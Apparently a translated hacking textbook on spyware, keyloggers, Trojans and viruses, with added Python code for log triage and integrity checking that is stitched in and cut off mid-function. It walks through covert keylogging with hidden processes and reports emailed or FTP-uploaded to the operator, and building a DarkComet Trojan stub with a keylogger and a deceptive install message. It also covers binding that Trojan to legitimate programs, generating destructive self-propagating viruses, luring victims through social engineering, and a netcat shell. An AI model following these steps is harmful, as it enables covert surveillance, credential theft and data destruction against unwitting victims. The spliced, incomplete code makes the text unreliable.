Many of the websites we use every day install cookies; Facebook is one example. A cookie is a kind of file that a website places on the computer to store our login information, preferences and other personal data, so that things go smoothly the next time we use that website. To explain further, suppose we log in to Facebook. Once we have visited facebook.com, the cookies make it unnecessary to log in again however many times we reopen it, as long as we have not logged out. Cookies can therefore collect information about our online activity.

In some software you can see them used to send error reports back to the vendor. Cookies are also used when reporting in order to learn about unknown extensions and infections. So applications and sites that use cookies share characteristics with spyware. They are not spyware, however; they can be called tracking software.

We have all seen user agreements when installing applications, but we often skip them without reading. Tracking software usually states clearly in its user agreement what it is going to track. Look at phone applications as well: at install time the application states that it will use access to camera, call, SMS, Gallery, audio, wifi, bluetooth, file location, and so on. We simply install applications without paying attention. As a result, data leaks through phones, and things like movies stored on the phone leaking out, come about.

Social media applications such as Facebook ask for camera access so that, when we use Facebook, we can take and upload photos, take and upload videos, and broadcast Live. But when an application that claims to clean out unneeded things to lighten your phone asks for camera access, that has to be called a dishonest scheme. Free apps are at the top of the list of things to be careful about.

There is also legitimate software such as child monitoring software. One example is a program like Trend Micro Titanium Maximum Security. It has sections that can be configured for a whole family. If there are children in the family, it can do things such as stop them from viewing inappropriate websites, stop them from opening certain work programs, and limit the time they spend on the internet. Because it reports to the parents what the children do on the internet, parents no longer need to keep watch all day. It can also protect children from the danger of online predators. Illegal spyware, by contrast, does not arrive with our knowledge and shows no agreement of any kind.

Spyware Distribution
How does spyware spread? As internet use becomes more widespread, the spread of spyware increases too. Most spyware spreads mainly through software obtained as free downloads and through applications that have been cracked and redistributed from somewhere other than the legitimate site. Because we tend to look for and use freeware and shareware, spyware reaches our systems when we download copies that have had spyware added and have been uploaded for free.

Why can the programmers who developed such free software keep producing new releases all the time even though they earn no income from it? They earn income by collecting our information and reselling our data to advertisers. They also earn income by placing advertisements in the application. Beyond that, they may even try to obtain and use things like our bank account and credit card numbers. Besides freeware and shareware, spyware can also spread through movies, songs, applications, games and so on from torrents like Pirate Bay that are illegally copied and produced, because those files contain spyware.

There are also websites that install spyware: pornography sites (18+ sites), gambling sites, and some sites that claim you can do online hacking there. Then there are sites that say "Your machine has viruses; you can clean it by getting and installing this software for free", sites that say "Your machine is slow, so clean out what you don't need" and tell you to install something, and so on. If we land on such sites and try what they offer, spyware gets put into our system.

Websites of this kind are the most commonly seen patterns today, and they install spyware without informing us at all. In addition, links that use pop-up windows, and plug-ins or extensions, can also spread spyware.
We have probably all come across pop-ups and web pages like those in the pictures above. When we see them we may think, "Does my machine really need cleaning?" These are not legitimate. They will install real spyware on our machines. If we have no security knowledge, we will happily install spyware ourselves, believing it will clean the viruses from the machine.

Anti-spyware is what finds and exposes spyware, and how anti-spyware works is interesting too. The ways spyware spreads include peer-to-peer distribution, cracked software, freeware/shareware, and the toolbars we tend to install in our web browsers. We may well have heard something like, "I have a camera-recorded copy of the film now showing in cinemas; copy it if you want it." Where do you think that film came from? It came from torrent sites like Pirate Bay that are full of viruses.

On computers used by our friends and acquaintances we can often find many search engine toolbars installed. You should not use any search engine toolbar that has not been approved by Microsoft, Mozilla or Google Chrome, because they are spyware. (Some people do not use them but deliberately keep them installed because they look fancy.) We must keep in mind that spyware sits hidden in our systems and sends our data and activity back to its owner (hacker).

Although it runs in the background, remember that spyware can consume resources such as the computer's CPU, memory and internet connection bandwidth. Spyware can cause system crashes and make our computers slow and normal operations sluggish. When using the internet, the connection may be good on the phone yet slow on the computer, so that pages take a long time to load, and when tethering from a phone the phone's data usage may shoot up. Some people even reach the point of wanting to buy a new computer. In fact these are simply the effects of being overrun by spyware.

If the browser's home page gets changed, or the default search engine gets changed, that also tells you spyware is present. Spyware sometimes comes as one part of malicious software, although this is rare. Some software can turn off or uninstall our firewall and anti-virus, and can even change the web browser's security settings.

Power Spy
The latest version of Power Spy can be obtained at ematrixsoft.com/download.php. It is made to be usable on Windows 8, 8.1 and Windows 10 as well, and is a type of legitimate tracking software. Serious hackers usually build their own spyware so that they can control it 100%. That, however, requires a solid understanding of programming languages and the ability to write programs. Since we are only just starting to learn, let's simply use existing software.

The first time you install and run it, you need to set a password. Enter a password and click Submit. You will then see a prompt to log in.

Enter the password you just set again and click submit.

The user name and unlock code are only for those who have purchased it. Since we are using the free version, just continue with later.

From here you can see at a glance what it can do. To start, just press Start monitoring. To hide this window, press Stealth Mode. To bring it back you use Ctrl + Alt + X, and if the X key is not suitable on your computer for some reason, you can change it in Configuration. Now let's hide it with Stealth Mode. The Control Box disappears from the Desktop, but as one weakness, a large "Monitor by" label remains at the right edge of the Desktop.

If we want to hide that, we cannot use the Free Version; it only works if you buy it. It is One time use (Online Base) and costs about US$ 50 for one installation. It can be used until it is uninstalled, and because it is a One Time Code it cannot be used on another machine; you have to buy again. Over here, however, there are many people who have no idea what "Monitored by POWER SPY" means, so it can still be used. It can also be installed openly on our own computers. :)

When you want to review the results, bring it back with Ctrl + Alt + X and click stop monitoring first. Then you can choose and view whatever you like. Under Screenshot you will see screenshots recording the changes on the screen we used, and by opening them one at a time you can tell what was done. Keystrokes records every key typed on our computer, and from that you can pick out the key words that are useful to you.

As an example, you can see the line where facebook.com was entered in the browser. You will see the user I entered to use Facebook (hakhakhak). It has recorded that the password was typed as woewoewoe. Clipboard shows what was copied on my computer, and application shows the applications that were opened while monitoring was running, including the number of times. While Power Spy is set to Start monitoring, restarting the computer does not stop it, so there is no need to worry about something slipping by unrecorded. With this much, I assume you understand how it is used.

What we discussed here is a piece of legitimate software that can be used lawfully. Illegal software, on the other hand, sends important data, like the data collected by the Power Spy we just demonstrated, to a malicious server. So within our workplaces we need to do what is necessary to stay free of the danger of spyware. (Protection is discussed further on.)

Keyloggers
Now for keyloggers. We have long known that keyloggers are used to record the characters typed on our computers and the text we copy. The Power Spy covered above also included a part that records keystrokes. A keylogger's main job is to record the keys typed on the keyboard.

So a keylogger stores the keystrokes we type in a txt file. It can also work in combination with some spyware such as Power Spy. Once combined in that way, it can go as far as sending the information back to the attacker. Because hackers are more interested in information such as our bank account information and user & password, it can even be programmed to record only from the moment the browser is opened until the browser is closed. A keylogger can therefore be seen as a process that works between our computer's keyboard and the operating system.

Hardware Keyloggers
The keyloggers we know of can be software, and they can also be hardware. Because they have to be placed in between the keyboard and the computer, hardware keyloggers are easy to spot. On desktop computers, however, the USB ports are at the back, so it is not easy to tell just by glancing.

If you look as though you were checking whether the keyboard cable had come loose, you can tell whether a hardware keylogger is present. The weaknesses of hardware keyloggers are that they are visible and that they cannot capture anything that is not typed on the keyboard. Their advantage is that they carry their own memory and therefore store no file on the computer. That is why anti-spyware and anti-virus cannot detect them.

A wireless keylogger can capture and collect the packets transferred between a wireless keyboard and its receiver. They come in many forms, and care is needed wherever wireless keyboards are in use. If possible, use only wired keyboards.

Software Keyloggers
We all know this one already, so there is probably little that needs special discussion. Because it can record not only the keystrokes typed on the keyboard but also copy-to-clipboard text copied out of existing files, more care is needed. Not being visible the way hardware is gives it a further advantage.

Software keyloggers come in many forms. Among hypervisor-based keyloggers, which reside within the OS and can operate in the background, VMware's ESXi product and Microsoft's Hyper-V are well known. Among software keyloggers, kernel-based software keyloggers are the more frightening. They are a type of keylogger that obtains privileges such as root or administrator access and hides inside the operating system so that it cannot be found.

Another form of keylogger is the API-based keylogger. API stands for Application Programming Interface. One kind of API keylogger can even record the PIN numbers used for authentication through the BIOS. Hackers can therefore come to know the keys needed to power on our computer.

The form grabbing keylogger is made simply to pull the data out of a form. It records what is entered into the forms on the websites we visit. For example, if we are going to open a new Gmail or Facebook account, we have to fill in a form. When we log in, too, we have to fill in the login form first. For hackers it could be called the most useful kind, because it records only important data such as user name & password, which makes them easy to find and spares the trouble of trawling through extra characters. There are also memory injection-based keyloggers that can help hackers bypass our Windows User Account Control; among them, Zeus and Spy Eye, which are bundled with Trojans, are well known.

Ultimate Keylogger
It can be downloaded from www.ultimatekeylogger.com. The more copies you buy, the lower the price, and it can be bought and used legitimately. When you first use it you have to set a password.

Because there are many main parts, I will go through them one at a time.

This part is already familiar. Start with Start Monitoring and, when you want to stop, just click Stop monitoring. View options is also self-explanatory. Log Applications means it will also record application usage; if you do not need it, you can clear the check mark. Take Screenshot every -- Minutes sets how many minutes (or how many seconds) apart screenshots of the victim computer are taken; you can clear it if you do not need it. Whether everything typed on the keyboard is recorded is set with Log all typed Keystrokes, and you can also set whether copy/paste is recorded. Log visited websites' URLs is the option that records the URLs of the websites the victim opened.

In the Security section you can set the key that brings the hidden window back. The default is Ctrl+Alt+Shift+S. Only the S can be changed; the rest cannot. Enable Password Protection means it is protected with a password. Hide process from Task Manager can be set so that it does not show up in Task Manager. To keep it from being found among the Program files, you can tick Hide application program files. Change Password is for changing the password.

In the Banner section you set whether or not it is shown in the system notification area, and you can have it display a message of your choosing every so many minutes/seconds.

The picture above is a sample I set up. You can write whatever you want to have displayed.

Send Reports Options is for having the recorded data sent back to us. Here, when you are on the same network, you can choose Send to Local/Network folder and adjust the LAN settings. In Send by E-mail you can enter the email address the reports should be sent to. Upload via FTP uploads to an FTP server, and we need to have FTP server access. You can then set the report to be sent every -- hours/minutes. Include Screenshots means the screenshots are sent as well, and Clear log after sending means the log is cleared from the machine immediately after it has been sent to us rather than being kept. If you want it sent in a password-protected ZIP archive, you can tick Password protect ZIP archive and enter the password in the box after it. The rest works on the same principle, so I will not discuss it.

Kernel Keyloggers
This type belongs to the software keylogger category and is the more frightening kind of keylogger. Because keyloggers of this type run at kernel level, they can take data directly from all kinds of input devices. Those who have studied A+ will understand this better. Every OS we use controls ring 0, the level that controls the hardware. User operations run in ring 3. Kernel keyloggers run in ring 0. That is why their operations are freer, and they can also freely report back to the hacker.

The reason is that, running at kernel level, they are hard for anti-virus and anti-spyware programs to find. Anti-virus and anti-spyware are user-level applications and run in ring 3. They are not capable of finding things in ring 0. Now that we know the nature of keyloggers and how they work, let us go on to discuss what to do to protect against them.

Protecting Yourself
We must expect that keyloggers are one part of larger malware. Malware means malicious software and may be some kind of Trojan or rootkit. A Trojan is a type that comes in disguised as something beneficial to us, and it is also a kind of spyware that can have keyloggers bundled in to trap and take our data. A rootkit can be roughly remembered as software installed in the kernel that, like kernel keyloggers, is hard for users to know about.

It is just like the way spyware spreads. Keyloggers, too, usually infect our systems through drive-by downloads from websites containing malicious code. Not only that: they can also infect us when malicious hackers take control of and modify a website we regularly visit and plant something there without our noticing. For users this is a very big issue. We visit websites almost every day. Facebook is a website too. So we find links to interesting websites in Facebook posts, and through them we end up visiting a great many websites.

We may well have come across websites where, on opening an article, pop-ups, spinner pages and (fake) virus warning pages keep popping up. So what needs to be done to protect our company or organization from being infected with spyware or keyloggers like these? Let's try to prevent it in advance as far as we can.
The first point is not to use the root or administrator account for ordinary tasks on our computers, whether they are for business or personal use. Set a strong password on the Administrator account and have people use only the other user accounts. When administrator access is needed, you can use run as administrator, so I assume this will be workable. This approach can protect us fairly well.

Next, if the browser we use is Firefox, you can search for no script under Mozilla Firefox >> Menu >> add-on >> plugins and install a plugin that can block scripts. Google Chrome users can likewise install the no script suit extension. If you use it, JavaScript will not work when you visit Facebook, so to use such sites you have to add the website.

You can add it easily by clicking the green +. It is a little more work, but it is safe. Sites that contain scripts are shown with a blue script notice. (My own http://www.khitminnyo.com also includes a Change Font script that lets you switch from Zawgyi to Unicode, so although the site can be opened, the Font Change switch may not appear. If you have the Zawgyi font installed there is no need to add the site. Adding it also poses no danger whatsoever.) :)

Besides these, not using free sharing files and torrent files such as those from Pirate Bay is also a good security measure. You should not use applications that have been cracked and re-uploaded. Also, do not click on pop-up ads. Another point is not to install ActiveX or untrusted browser add-ons. One more point is to use anti-virus and anti-spyware and to update them regularly.
I do not mean that carrying out the methods described makes you 100% secure. Hackers are always ahead of the defenders. But if you do the few things I have discussed, it will become harder to get into our systems, and those who merely want to try things out will be pushed towards an easier target.

Finally, I would like to share again a piece of advice my teacher gave me. What my teacher used to say is "Free software is not free". Even a version released as an advertisement to make you want to use the pro version does not really come free. (At the very least you have to watch the ads.) So software whose licensed version has been cracked and is being redistributed is not free either. At the very least your information will be gathered, and if your data is useful to them it will be taken and used. As for useless data and the information of an ordinary user, there is nothing to worry about.

One of the tools penetration testers use most when hunting for spyware of this kind is HiJackThis, an open source tool. It was owned by Trend Micro and was released as open source. (Free and open source are not the same thing; they are alike only in that you can get them free of charge.) Many anti-virus companies also have free anti-virus editions that let you try out their products. But we need to install and use these on our computers early. Installing them only after being infected leaves their results less trustworthy.

HijackThis
If you want to get this application, you can get it from bit.ly/kmn-hjt or bit.ly/hjt-kmn.

Using it is simple and clear, so I will not show it here. Do a system scan and save log file not only scans the system but also saves the logfile. If you only want to scan, you can scan with Do a system scan only.

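The saved HijackThis log is where the signs described in this chapter (changed home page or search engine, unknown toolbars, a program that starts again after every reboot) can be checked. The following is an added example, not part of the book: a small triage script over a constructed sample log, assuming the usual HijackThis entry layout (`R0`/`R1` for Internet Explorer start and search pages, `O2` for Browser Helper Objects, `O3` for toolbars, `O4` for autostart entries); the function names, the allowlist and every path and host in the sample are hypothetical.

```python
import re
from dataclasses import dataclass
from urllib.parse import urlparse

# Constructed sample in the HijackThis layout "<section> - <detail>".
SAMPLE_LOG = r"""
Logfile of HijackThis (constructed sample)

Running processes:
C:\Windows\system32\taskhost.exe
C:\Users\demo\AppData\Roaming\helper\kbdsvc.exe

R0 - HKCU\Software\Microsoft\Internet Explorer\Main,Start Page = http://search.example.invalid/
R1 - HKCU\Software\Microsoft\Internet Explorer\Main,Search Page = http://search.example.invalid/find
O2 - BHO: Example Helper - {11111111-2222-3333-4444-555555555555} - C:\Program Files\ExampleBar\helper.dll
O3 - Toolbar: Example Search Toolbar - {66666666-7777-8888-9999-000000000000} - C:\Program Files\ExampleBar\bar.dll
O4 - HKLM\..\Run: [SecurityHealth] C:\Windows\system32\SecurityHealthSystray.exe
O4 - HKCU\..\Run: [kbdsvc] C:\Users\demo\AppData\Roaming\helper\kbdsvc.exe /hidden
O23 - Service: Example Update Service - Unknown owner - C:\Program Files\Example\update.exe
"""

ENTRY_RE = re.compile(r"^(R[0-3]|O\d{1,2}|F[0-3]|N[1-4])\s+-\s+(.*)$")
# Folders an unprivileged user can write to (heuristic, not exhaustive).
USER_WRITABLE_RE = re.compile(r"\\(AppData|Temp|Downloads)\\", re.IGNORECASE)
EXE_PATH_RE = re.compile(r'[A-Za-z]:\\[^"*?<>|]+?\.(?:exe|dll|scr|bat)', re.IGNORECASE)


@dataclass(frozen=True)
class Finding:
    section: str
    reason: str
    detail: str


def parse_log(text):
    """Split a log into (running_processes, [(section, detail), ...])."""
    processes, entries, in_procs = [], [], False
    for raw in text.splitlines():
        line = raw.strip()
        if line.lower().startswith("running processes"):
            in_procs = True
            continue
        match = ENTRY_RE.match(line)
        if match:
            in_procs = False
            entries.append((match.group(1), match.group(2)))
        elif in_procs and line:
            processes.append(line)
    return processes, entries


def triage(text, expected_hosts):
    """Return the entries a reviewer should look at first.

    expected_hosts: hosts the organisation accepts as home/search page.
    """
    processes, entries = parse_log(text)
    findings = []
    for proc in processes:
        if USER_WRITABLE_RE.search(proc):
            findings.append(Finding("process", "runs from a user-writable folder", proc))
    for section, detail in entries:
        if section in ("R0", "R1"):
            # Home page or search engine changed: one of the signs named above.
            _, _, value = detail.partition(" = ")
            host = (urlparse(value.strip()).hostname or "").lower()
            if host and host not in expected_hosts:
                findings.append(Finding(section, "start/search page on unexpected host", host))
        elif section in ("O2", "O3"):
            # Browser helper objects and toolbars always deserve a manual check.
            findings.append(Finding(section, "browser add-on or toolbar to verify", detail))
        elif section == "O4":
            # Autostart entries survive a reboot; flag those outside system folders.
            match = EXE_PATH_RE.search(detail)
            if match and USER_WRITABLE_RE.search(match.group(0)):
                findings.append(Finding(section, "autostart from a user-writable folder", match.group(0)))
    return findings


if __name__ == "__main__":
    for f in triage(SAMPLE_LOG, {"intranet.example.invalid"}):
        print(f"{f.section:8} {f.reason}: {f.detail}")
```

A flagged line is a prompt for manual review, not a verdict: legitimate software also installs toolbars and per-user autostart entries.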
Key Scrambler
Another way to protect against the danger of spyware and keyloggers is to use Key Scrambler. Rather than saying it protects, it is more accurate to say that it confuses the keylogger. The way it works is that it encrypts the keystrokes typed on the keyboard before the keylogger is able to record them.

You can download it by typing bit.ly/kmn-ksb into your browser. On the download page there are a personal (free) version, a Pro version and a Premium version; Pro and Premium are paid versions, and a single purchase can be used on up to three computers. I will demonstrate with the free version. Let's say it has been downloaded and installed.

As soon as installation finishes it asks you to reboot, and it starts working once the computer has come back up. The premium versions can start working as soon as the power is turned on and can even encrypt user logins. They are also capable of thwarting kernel-based keyloggers. The free version cannot protect Windows login information, but it does protect with its encryption method from the time programs are able to start.

I assume that by now you understand spyware & keyloggers reasonably well. Let's move on to another chapter.

CHAPTER 19: Trojans & Backdoors

Introduction

A Trojan, which we know as a Trojan horse, is a type of malware program. It cannot replicate itself the way worms do, but it is a type to be careful of because on the outside it comes in under the guise of legitimate software, while inside it contains malicious code designed to steal our information. In addition, a Trojan horse program may contain malware that can infect our computer.

We have all heard the story of the war at Troy. The Trojan horse program takes its name from the great horse figure that the Greeks cunningly built in order to get into the city of Troy in the historic Trojan war, and it behaves according to the same principle as that horse. Trojans also often perform backdoor duties and allow outside connections to enter our systems.

Trojans are not easy to detect. If Trojans have arrived, however, Internet bandwidth use on our computer will rise noticeably. After it has entered, a Trojan does not inject itself into other files at all. What infects other files as well is a virus. Likewise, Trojans do not multiply by themselves. Only worms can propagate or replicate themselves. This is discussed further in the next chapter. The most upsetting Trojans are the kind that arrive claiming they will clean the viruses on our computer.

We discussed that Trojans can perform the backdoor role. A backdoor is something used to bypass the authentication method when connecting to a computer system. The name stands for being able to use the back door when it is not easy to get in through the front of the house. Traditional backdoors have a symmetric nature. That is to say, both ends must have the same connection. On PCs that have been infected more than once, such backdoors may be left behind, and if someone discovers that backdoor they can make use of it.

If the two ends of the connection are not the same, asymmetric backdoors can be used. That kind of attack is called Kleptography and is a major part of today's field of Cryptovirology.
When malware is created, thought also has to be given to making it spread easily. If it does not spread easily, the malware will not be effective. In distributing malware this way, botnets play an important role. The attacker sends spam messages containing a link that leads to the malware. An unsuspecting victim clicks that link, and from there the infection spreads. Such malware can also be hidden inside legitimate sites.

In messages of this kind, a few words that can arouse the victim's curiosity are usually placed in the headline. For example, they use social engineering to send content that arouses curiosity, such as an embarrassing photo of one of your friends or mutual friends. The message may be sent while impersonating your friend.

In such attacks you can see many forms, such as telling you to download an executable file, or taking you to a web page that hosts exploits able to attack based on browser vulnerabilities. Besides these, malware can also arrive from USB, DVD, plugins and so on. Although there are many websites where free software can be obtained legitimately, users often install it from people who re-upload it or from cheaply bought discs. When software that is redistributed for free from places other than its origin is checked, we find things like malware bundled in, malicious code added, and malware placed in the crack file.

Capabilities
Malware can perform both good and bad actions. In fact, malware is not the kind of application we knowingly install ourselves. It may be part of some software that takes up residence in our system without our knowledge and works either for the attacker's benefit or to damage our system.

Malware is also capable of carrying out DoS attacks, either against the victim's computer or from the victim's computer against other computers. Malware can also be used as an FTP Trojan. There are many types of Trojans, and their capabilities differ. A Trojan Banker is used to steal bank accounts and debit or credit cards. Trojans scan the infected computer for passwords, cached passwords and so on, and send them back to the hacker.

A DoS attack Trojan can make infected computers take part in DDoS attacks against other computers. There is also the Fake Anti-Virus Trojan, which settles in while pretending to remove other viruses on our machine. While Trojans customarily steal information covertly, this type works mainly to steal money. It is cunning enough that, to keep us from removing it, it frequently displays viruses and resolves them with one click of "clean", so we tend to keep it on the computer as a friend. In reality, the viruses it claims to have found (the 1 or 2 it keeps reporting) do not exist. It shows fake notifications (warnings) on its own, and its removal is only a pretend removal. Later, as time goes by, it starts to show many viruses and demands money to clean them. It will also offer other "Anti-virus pro" products for sale at low prices. If we enter our credit card information and buy from it at those low prices, it will use the information it obtained to withdraw as much money from our card as it can.

There is also a type that gamers hate, the Game Thief Trojan. It mainly targets online game accounts. Since online game accounts often include payment information, accounts linked to a credit card also mean financial loss. Gamers, though, tend to regret the loss of the high levels they spent their time reaching more than the money.

Trojan-IM mainly targets our login information, while Trojan Ransom modifies our data and demands money for getting the data back. Trojan SMS can be regarded as working for the operators in some countries: it runs up costs by making mobile users send SMS messages automatically. Trojan Spy works the way the spyware we already know does.

Netcat
Netcat, which can do many jobs like a Swiss Army knife, is often called the "Swiss Army Knife for hackers". In other words, it is an all-purpose tool for hackers. It is also a Windows-based tool that can create both outbound and inbound connections, over TCP or UDP. That it can use any port is one reason ethical hackers use Netcat so much.

We already know that it can be used as a port scanner. Netcat is a command-line tool and includes many switches for managing programs. In a terminal you can type netcat -h to look at each option in detail, and you can also open the manual with man netcat. In Netcat, -v means verbose mode, and -vv gives more verbose output. The -d option makes netcat run in stealth mode, and -z is the zero mode used for port scanning. -w2 is used as a timeout value (in seconds). Netcat can also be used in a telnet-like way, and it can be invoked as either netcat or nc. Netcat for Windows can be downloaded from bit.ly/kmn-nc. Extract the downloaded zip file into a folder called nc, then Ctrl + right-click on empty space and choose "Open command windows here".

After that, cmd is inside the netcat folder, so commands can be used right away. The putty application needed to try this on Windows can be downloaded from bit.ly/kmn-putty. It is a small application that needs no installation. Then, still on Windows, netcat commands can be used in the cmd (command line) opened on the nc folder mentioned earlier with Shift + right-click >> "Open command window here". We will use -l to listen, -v for verbose mode, -p for the port and -e for the executable.

The first time it is used, it will ask for access. It needs to be allowed. In the picture above, I entered port 4444 and chose cmd.exe as the executable. Then open putty.

In the putty configuration, the IP and port 443 can be configured.

Enter the login information.

I logged in as the root user.

You will see root@kali:~# appear in putty. That is because I connected to a VM running Kali Linux.

Trojan
Trojans were already discussed briefly above. The type of Trojan most often seen today is the Remote Access Trojan (RAT). A RAT is built from three independent, separate components. As an example, let us discuss the RAT called Apocalypse. The malicious code that will run on the infected computer is held in the server. Here the server is on the victim, not on the attacker. The client is the program the attacker builds in order to control the server. Data can be shared between the client and the server. There is also a server-builder program for creating the server in the form the hacker wants. The hacker can change the ports the server listens on if desired, and can also establish the registry keys needed for configuration. The data traffic between client and server can also be encrypted if desired.

DarkComet RAT
Among Remote Access Trojans (RATs), the one discussed now is DarkComet RAT. It can be downloaded from bit.ly/dcRAT-kmn. The zip password is rekings.com. It is a portable app that is not installed, so it needs to be kept as a folder.

Open it and, from the menu, go to server module >> Full editor. You will see the settings available to choose from.

There is nothing very special in Main settings. A security password can be set if desired; if a password is used, the same password must also be set in the client settings. Let us leave it without a password. Active FWB is for when a firewall bypass is needed. It lists three situations in which it should not be used; if none of the three applies, it can be used.

In Network settings, enter the IP and port. Here only the local host IP is shown as a sample. More can be added using add.

In Module Startup, things can be adjusted if desired, such as the creation date or the parent folder attrib.

In Install Message, you can enter what should be displayed while the program you created is being installed. Pressing Test Message Box previews how it will appear.

Whatever is suitable for deceiving the victim can be written here.

In Module Shield, just tick the items you want to add, for example disabling Task Manager. I disabled only Anti-Virus Notify.

In the Keylogger section, activate the keylogger. If we have an FTP host set up, entering its address, user and password makes it upload the logs to our FTP server. Client settings can also be adjusted further by clicking the person icon next to Account. That part is not shown here.

In Choose Icon, if you do not like the sample icons provided, icons you made yourself can also be used.

File Binder is the option to use if the created file is to be combined with another photo, movie, mp3 and so on. (I do not use it.)

Finally, in Stub Finalization you will see choices such as .exe, .com and .bat. I continued with .exe.

With everything done, I pressed Build The Stub at the bottom and saved the result on the Desktop under the name test.exe. Looking at the Desktop now, the test.exe (Trojan) I created is there. When the victim opens it, they will see the message we specified, with only an OK button to press.

To listen, use "listen to new port".
Wrappers
We have now created a Trojan containing a keylogger. Such Trojans may be sent to the target as they are, or may have to be combined with other files. Since it cannot be said for certain that the file we send will be opened, the chances of success are higher only if it is delivered in varied forms and guises. So how are two or more programs combined? This is where wrappers come in.

There are wrapping tools that help with this kind of packaging: Elite Wrap, IzPack for Java applications, Senna Spy and File Joiner. There are many other tools as well. The purpose of using these tools is to insert a virus or malware into legitimate software. (This is why it was said that torrent sites and cracked applications should not be used.)

File Joiner
Download it from bit.ly/kmn-fj and extract it. It is a portable file, so simply opening it shows the window pictured above.

Using Add file, I selected two files, a program file and the Trojan named test.exe from earlier, and pressed Join. The files are not large, so it takes only a moment, and the output file can then be found in the chosen output location. A similar file joiner can also be downloaded from bit.ly/adv-fj.

Counter Measures
As for what should be done as countermeasures: in our company or organization, if possible, a licensed version of Windows should be used and system updates should be applied regularly.

Anti-virus software must be used, and its virus definitions must always be kept up to date. Next, everyone (all staff) who uses a networked computer in the workplace needs security awareness training, and installing or using applications other than those strictly required for work should not be permitted.

As discussed in earlier chapters, users should not work from the Administrator account; arrange for them to use other user accounts. When software is needed, obtaining it only from trusted or original sites also helps protect against this. Let us end this chapter here.
CHAPTER 20: Virus and Worms

Introduction

A computer virus can be described as a type of malware that can both execute and replicate on a target host. Most viruses target data files or executable files, while some focus on the target's boot sector.

The intention of a virus is to harm the infected system. Viruses may delete or encrypt data and may also damage the OS. Some viruses can even destroy hardware. Viruses may also steal information.

Viruses often have special capabilities. They also try to keep anti-virus software from finding them; let us call this a stealth technique.

For the most part, so that their presence goes unnoticed, viruses do not destroy legitimate software or data. When a program is infected, the virus code is inserted at the beginning of the legitimate application, so that when the user opens the program, the virus code runs as well.

Viruses can also be given a set time so that the code runs only when that time arrives, activating at exactly the specified date and time. How a virus behaves varies with the imagination and wishes of its creator.

To write such viruses, one needs a good understanding of the relevant programming languages and needs to have studied virus code. However, simple viruses can be created even without programming knowledge. This chapter discusses creating viruses using virus creation tools. The aim is only to let you know what can be done and what can happen, so that you can decide how to protect against it, so I ask in advance that you do not create viruses and use them on one another.
Delete Me Virus Maker (DELme)
The virus creators needed can be downloaded from bit.ly/virus-creators. The download contains five virus makers, and because they include ready-made virus code for creating viruses, they should be used and tested only on virtual Windows machines. Only one of the five, Delete Me, is discussed here. Let us open Delete Me.

As soon as it opens you will see a window like this.

In Virus Name, give whatever name suits you. Since I am only demonstrating, I named it test. In Virus Author, enter an alias (the real name should not be entered). Since this is only a demonstration, I entered kmn. Do not click anything else yet. Once that is done, we move on to its three main options.

Of the three main options, Infection, Payload and Other Options, the first is Infection. Under Local Infection, clicking an item makes the program code appear in the black box on the left. Those who want to study can look at the code as well. Under Local Infection you can choose what to target, with one click. (Do not select everything; the damage would be severe.) I left that part with nothing selected.

Under Filetype Infection, click the file types to be affected, such as exe, txt, lnk, pdf, Mp3, Mp4, Doc, Xml, Png. If all are selected, all will be destroyed.

This next part is where file types missing from the list above can be added for the attack by file type. Between one and ten can be added. I added jpg, which was not in the list above. (Anything not needed can be skipped; nothing here is mandatory.)

The second option is Payload. There too, click what you need and skip what you do not.

This stage is the deletion stage and should be used with care. Clicking Delete All .Mp3 here will delete every Mp3 on the computer. As usual, click what you want to happen and leave the rest.

If there are further file types to delete, they can be added, for example rar, zip, and so on.

Delete Program works the same way; click whatever is to be deleted. I deleted only IE, which I never use.

At the bottom, under Internet Options, the home page of the victim's browser can be changed to a website of your choosing.

Finally, in Other Options you can likewise click whatever matches your wishes. Kill stops whatever is currently running immediately, so some unsaved data can be lost.

If you want other malware you have created to be downloaded, a link can be entered here as well.

This is the side where the code is shown. Once everything has been adjusted to your liking, choose Save As .Bat. (To study the code, it can be exported as .Txt.) After choosing a location and saving, you have the .Bat script. Sent as it is, the victim is unlikely even to open it. We have to change its appearance. Once it has been wrapped up in a nice package, the target is closer to opening it. To get them to open it, it can be sent using social engineering, or shown to them inconspicuously where they will see it. If they like movies, it is just hidden inside a movie. :)

JPS Virus Maker


This is another interesting virus maker. It can be downloaded from bit.ly/jps-kmn. I downloaded 3.0, the latest version at the moment, and use it for this discussion.

Opening JPS shows the window pictured above. Auto Startup alone is ticked by default. The remaining functions are assumed to be easy to understand, so they are not explained one by one; just tick the functions you want. Name After Install is the name the created virus will take once it reaches the system. In server name, a name of the form name.exe can be given. Then click the >> at the spot pointed out in the picture above.

If the victim uses Windows XP, the XP password can be changed to whatever you wish. The computer name, IE home page and so on can be changed, and a self-propagating worm mode can also be enabled. Its weakness is that it does not offer many icons. Once everything is as desired, click Create Virus and the result appears as an exe file in the JPS folder. Getting it to the victim is up to you.

Stealth Strategies and Infection


Viruses use many methods to avoid being caught by anti-virus software. One is intercepting requests. To scan, anti-virus software has to make requests to the OS. Viruses intercept those requests and return the answer they want for the infected versions of the files. So the anti-virus receives only the answer that those files are clean and reports no virus. The virus, though present, escapes.

The best way to fight this kind of virus is to use an integrity checker and to replace the infected OS files, or to scan from some other clean device. In my experience, quite a few companies pay no attention to virus infections on the computers they use. In some organizations I have even seen USB sticks being used without scanning.
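The integrity check recommended above, as an added Python example (not code from the book): a baseline of SHA-256 hashes taken while the system is clean is compared with the current files, and a file whose original bytes survive intact at its end is reported as "prepended", the pattern this chapter describes for code inserted at the start of a program. File names and contents are constructed for the demonstration.

```python
import hashlib
import os
import tempfile


def digest(data: bytes) -> str:
    return hashlib.sha256(data).hexdigest()


def walk(root: str):
    """Yield (relative path, content) for every file under root."""
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            with open(path, "rb") as fh:
                yield os.path.relpath(path, root), fh.read()


def build_baseline(root: str) -> dict:
    """Record size and SHA-256 per file. Take this while the system is known clean
    and keep it offline, where malware on the machine cannot rewrite it."""
    return {rel: {"size": len(data), "sha256": digest(data)} for rel, data in walk(root)}


def verify(root: str, baseline: dict) -> dict:
    """Classify every difference between the tree and the baseline.
    Run from clean boot media so file reads are not answered by an interceptor."""
    report = {"prepended": [], "modified": [], "new": [], "missing": []}
    seen = set()
    for rel, data in walk(root):
        seen.add(rel)
        entry = baseline.get(rel)
        if entry is None:
            report["new"].append(rel)
        elif digest(data) != entry["sha256"]:
            size = entry["size"]
            # If the last `size` bytes still hash to the baseline value, the original
            # content is intact and something was inserted in front of it.
            tail = data[-size:] if 0 < size < len(data) else b""
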